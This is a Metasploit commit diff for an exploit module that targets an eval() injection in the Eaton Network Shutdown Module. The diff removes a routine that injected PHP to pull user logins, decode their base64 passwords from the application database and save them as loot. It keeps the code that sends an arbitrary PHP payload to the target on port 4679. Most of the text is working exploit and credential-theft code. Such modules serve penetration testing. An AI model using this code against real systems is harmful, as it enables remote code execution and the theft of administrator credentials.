Strip the credential dumping stuff (making it auxiliary)

Also a little description update

Author: sinn3r

modules/exploits/multi/http/eaton_nsm_code_exec.rb

@@ -18,12 +18,13 @@ def initialize(info = {})
 			'Description'    => %q{
 				This module exploits a vulnerability in lib/dbtools.inc which uses
 				unsanitized user input inside a eval() call. Additionally the base64 encoded
-				user credentials are extracted from the database of the application.
-
+				user credentials are extracted from the database of the application. Please
+				note that in order to be able to steal credentials, the vulnerable service
+				must have at least one USV module (an entry in the "nodes" table in mgedb.db)
 			},
 			'Author'         => [ 'h0ng10' ],       # original discovery, msf module
 			'License'        => MSF_LICENSE,
-			'Version'		 => '$Revision$',
+			'Version'        => '$Revision$',
 			'References'     =>
 				[
 					['OSVDB', '83199'],
@@ -33,22 +34,20 @@ def initialize(info = {})
 				{
 					'DisableNops' => true,
 					'Space'       => 4000,
-					'Keys'		=> ['php']
+					'Keys'        => ['php']
 				},
-			'Platform'    => ['php'],
-			'Arch'        => ARCH_PHP,
+			'Platform'        => ['php'],
+			'Arch'           => ARCH_PHP,
 
-			'Targets'     => [[ 'Automatic', { }]],
+			'Targets'        => [[ 'Automatic', { }]],
 			'DefaultTarget'  => 0,
-			'Privileged' => true,
+			'Privileged'     => true,
 			'DisclosureDate' => 'Jun 26 2012'
-			))
+		))
 
 		register_options(
 			[
-				Opt::RPORT(4679),
-				OptBool.new('READ_CREDS', [ true, 'Extract credentials from the target db', true ]),
-
+				Opt::RPORT(4679)
 			], self.class)
 	end
 
@@ -65,42 +64,6 @@ def check
 		return CheckCode::Safe
 	end
 
-	def read_credentials()
-		pattern = rand_text_numeric(10)
-		users_var = rand_text_alpha(10)
-		user_var = rand_text_alpha(10)
-		php = <<-EOT
-		$#{users_var} = &queryDB("SELECT * FROM configUsers;");
-		foreach($#{users_var} as $#{user_var}) {
-		print "#{pattern}" .$#{user_var}["login"]."#{pattern}".base64_decode($#{user_var}["pwd"])."#{pattern}";
-		} die();
-		EOT
-
-		print_status("Reading user credentials from the database")
-		response = execute_php_code(php)
-
-		if not response or response.code != 200 then
-			print_error("Failed: Error requesting page")
-			return
-		end
-
-		credentials = response.body.to_s.scan(/\d{10}(.*)\d{10}(.*)\d{10}/)
-
-		return if credentials.length == 0
-		print_status("Got #{credentials.length} record(s):")
-		cred_txt = "#Username:Password\n"
-		credentials.each do |record|
-			print_status("Username: #{record[0]}, Password: #{record[1]}")
-			cred_txt << "#{record[0]}:#{record[1]}\n"
-		end
-
-		loot_name = "eaton.nsm.credentials"
-		loot_type = "text/plain"
-		loot_filename = "eaton_nsm_creds.txt"
-		loot_desc = "Eaton Network Shutdown Module credentials"
-		store_loot(loot_name, loot_type, datastore['RHOST'], cred_txt, loot_filename, loot_desc)
-	end
-
 	def execute_php_code(code, opts = {})
 		param_name = rand_text_alpha(6)
 		padding = rand_text_alpha(6)
@@ -123,13 +86,12 @@ def execute_php_code(code, opts = {})
 					{
 						'Connection' => 'Close',
 					}
-				}, 5)
+				})
 		res
 	end
 
 	def exploit
-		read_credentials unless datastore['READ_CREDS'] == false
-		print_status("Sending payload")
+		print_status("#{rhost}:#{rport} - Sending payload")
 		execute_php_code(payload.encoded)
 		handler
 	end